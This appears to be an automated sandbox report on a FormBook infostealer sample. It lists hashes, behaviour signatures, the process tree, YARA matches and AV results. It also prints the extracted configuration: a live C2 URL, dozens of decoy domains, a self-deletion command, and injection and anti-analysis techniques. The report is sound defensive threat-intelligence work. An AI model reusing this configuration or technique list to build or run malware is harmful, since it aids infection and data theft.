Play interactive tour

Edit tour

Analysis Report lpdKSOB78u.exe

Overview

General Information

Sample Name:	lpdKSOB78u.exe
Analysis ID:	356515
MD5:	f10054d325df455c58ecb16ea660d3f2
SHA1:	54871af48b64576922b97965efeeea94976bc119
SHA256:	b060cb81afd9113cfbbb1e346c99e503c545da47ed80096c021b7ca41c064c76
Tags:	exeFormbook
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

lpdKSOB78u.exe (PID: 6076 cmdline: 'C:\Users\user\Desktop\lpdKSOB78u.exe' MD5: F10054D325DF455C58ECB16EA660D3F2)

lpdKSOB78u.exe (PID: 5652 cmdline: 'C:\Users\user\Desktop\lpdKSOB78u.exe' MD5: F10054D325DF455C58ECB16EA660D3F2)

explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

raserver.exe (PID: 6748 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)

cmd.exe (PID: 6956 cmdline: /c del 'C:\Users\user\Desktop\lpdKSOB78u.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.torontotel.com/4qdc/"], "decoy": ["mangpe.asia", "mmstruckingllc.com", "ascendingworship.com", "gfeets.com", "smartcbda.com", "dreaminggrand.com", "dohostar.com", "farkindalik365.com", "weareexpatwomen.com", "gamereruns.com", "rosesandframes.com", "commagx4.info", "tarpleymusic.info", "szttskj.com", "calatheahomeservices.com", "qm7886.com", "emunmous.com", "deutschclub.com", "39palmavenue.com", "thepixxelgroup.com", "buildassetswealth.com", "oscarandmarina.com", "zingoworks.space", "edgewooddhr.net", "earth-emily.com", "belanjagratis.com", "sandrapidal.com", "btvstudios.com", "aberdareroyalcottages.com", "officialgiftclub.com", "kerdbooks.com", "havemercyinc.net", "sunsitek.com", "larek.store", "radioapostolicadigital.com", "xcuswaeheje.com", "ndk168.com", "pcareinc.com", "beconfidentagain.com", "codejunkys.com", "constancescot.com", "inbarrel.com", "thepurepharmacy.com", "finoblog.com", "orderbbqculinary.com", "bgshtswp.com", "hezhengnet.com", "clerolaustrie.com", "speedysnacksbox.com", "amazonia.coffee", "mnkmultiservicios.com", "antips.com", "powerofphoto.com", "trackyourvote.com", "equiposddl.com", "mintmobikeplus.com", "grn-shop.com", "fabslab.coffee", "musicindustrymag.com", "cyprusdivingcenters.com", "sunsilify.com", "rehabcareconnect.com", "kingscarehospital.com", "pompomlearning.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.lpdKSOB78u.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.lpdKSOB78u.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.lpdKSOB78u.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
0.2.lpdKSOB78u.exe.2a30000.5.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.lpdKSOB78u.exe.2a30000.5.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.lpdKSOB78u.exe.2a30000.5.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158a9:$sqlite3step: 68 34 1C 7B E1 0x159bc:$sqlite3step: 68 34 1C 7B E1 0x158d8:$sqlite3text: 68 38 2A 90 C5 0x159fd:$sqlite3text: 68 38 2A 90 C5 0x158eb:$sqlite3blob: 68 53 D8 7F 8C 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
1.1.lpdKSOB78u.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.1.lpdKSOB78u.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.1.lpdKSOB78u.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158a9:$sqlite3step: 68 34 1C 7B E1 0x159bc:$sqlite3step: 68 34 1C 7B E1 0x158d8:$sqlite3text: 68 38 2A 90 C5 0x159fd:$sqlite3text: 68 38 2A 90 C5 0x158eb:$sqlite3blob: 68 53 D8 7F 8C 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
0.2.lpdKSOB78u.exe.2a30000.5.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.lpdKSOB78u.exe.2a30000.5.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.lpdKSOB78u.exe.2a30000.5.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
1.2.lpdKSOB78u.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.lpdKSOB78u.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.lpdKSOB78u.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158a9:$sqlite3step: 68 34 1C 7B E1 0x159bc:$sqlite3step: 68 34 1C 7B E1 0x158d8:$sqlite3text: 68 38 2A 90 C5 0x159fd:$sqlite3text: 68 38 2A 90 C5 0x158eb:$sqlite3blob: 68 53 D8 7F 8C 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
1.1.lpdKSOB78u.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.1.lpdKSOB78u.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.1.lpdKSOB78u.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 13 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 1.2.lpdKSOB78u.exe.400000.0.raw.unpack

Malware Configuration Extractor: FormBook {"C2 list": ["www.torontotel.com/4qdc/"], "decoy": ["mangpe.asia", "mmstruckingllc.com", "ascendingworship.com", "gfeets.com", "smartcbda.com", "dreaminggrand.com", "dohostar.com", "farkindalik365.com", "weareexpatwomen.com", "gamereruns.com", "rosesandframes.com", "commagx4.info", "tarpleymusic.info", "szttskj.com", "calatheahomeservices.com", "qm7886.com", "emunmous.com", "deutschclub.com", "39palmavenue.com", "thepixxelgroup.com", "buildassetswealth.com", "oscarandmarina.com", "zingoworks.space", "edgewooddhr.net", "earth-emily.com", "belanjagratis.com", "sandrapidal.com", "btvstudios.com", "aberdareroyalcottages.com", "officialgiftclub.com", "kerdbooks.com", "havemercyinc.net", "sunsitek.com", "larek.store", "radioapostolicadigital.com", "xcuswaeheje.com", "ndk168.com", "pcareinc.com", "beconfidentagain.com", "codejunkys.com", "constancescot.com", "inbarrel.com", "thepurepharmacy.com", "finoblog.com", "orderbbqculinary.com", "bgshtswp.com", "hezhengnet.com", "clerolaustrie.com", "speedysnacksbox.com", "amazonia.coffee", "mnkmultiservicios.com", "antips.com", "powerofphoto.com", "trackyourvote.com", "equiposddl.com", "mintmobikeplus.com", "grn-shop.com", "fabslab.coffee", "musicindustrymag.com", "cyprusdivingcenters.com", "sunsilify.com", "rehabcareconnect.com", "kingscarehospital.com", "pompomlearning.com"]}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\h1luljvls0ea.dll

ReversingLabs: Detection: 21%

Multi AV Scanner detection for submitted file

Show sources

Source: lpdKSOB78u.exe	Virustotal: Detection: 44%			Perma Link
Source: lpdKSOB78u.exe	ReversingLabs: Detection: 36%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lpdKSOB78u.exe.2a30000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lpdKSOB78u.exe.2a30000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Show sources

Source: lpdKSOB78u.exe

Joe Sandbox ML: detected

Source: 0.2.lpdKSOB78u.exe.2a30000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.lpdKSOB78u.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
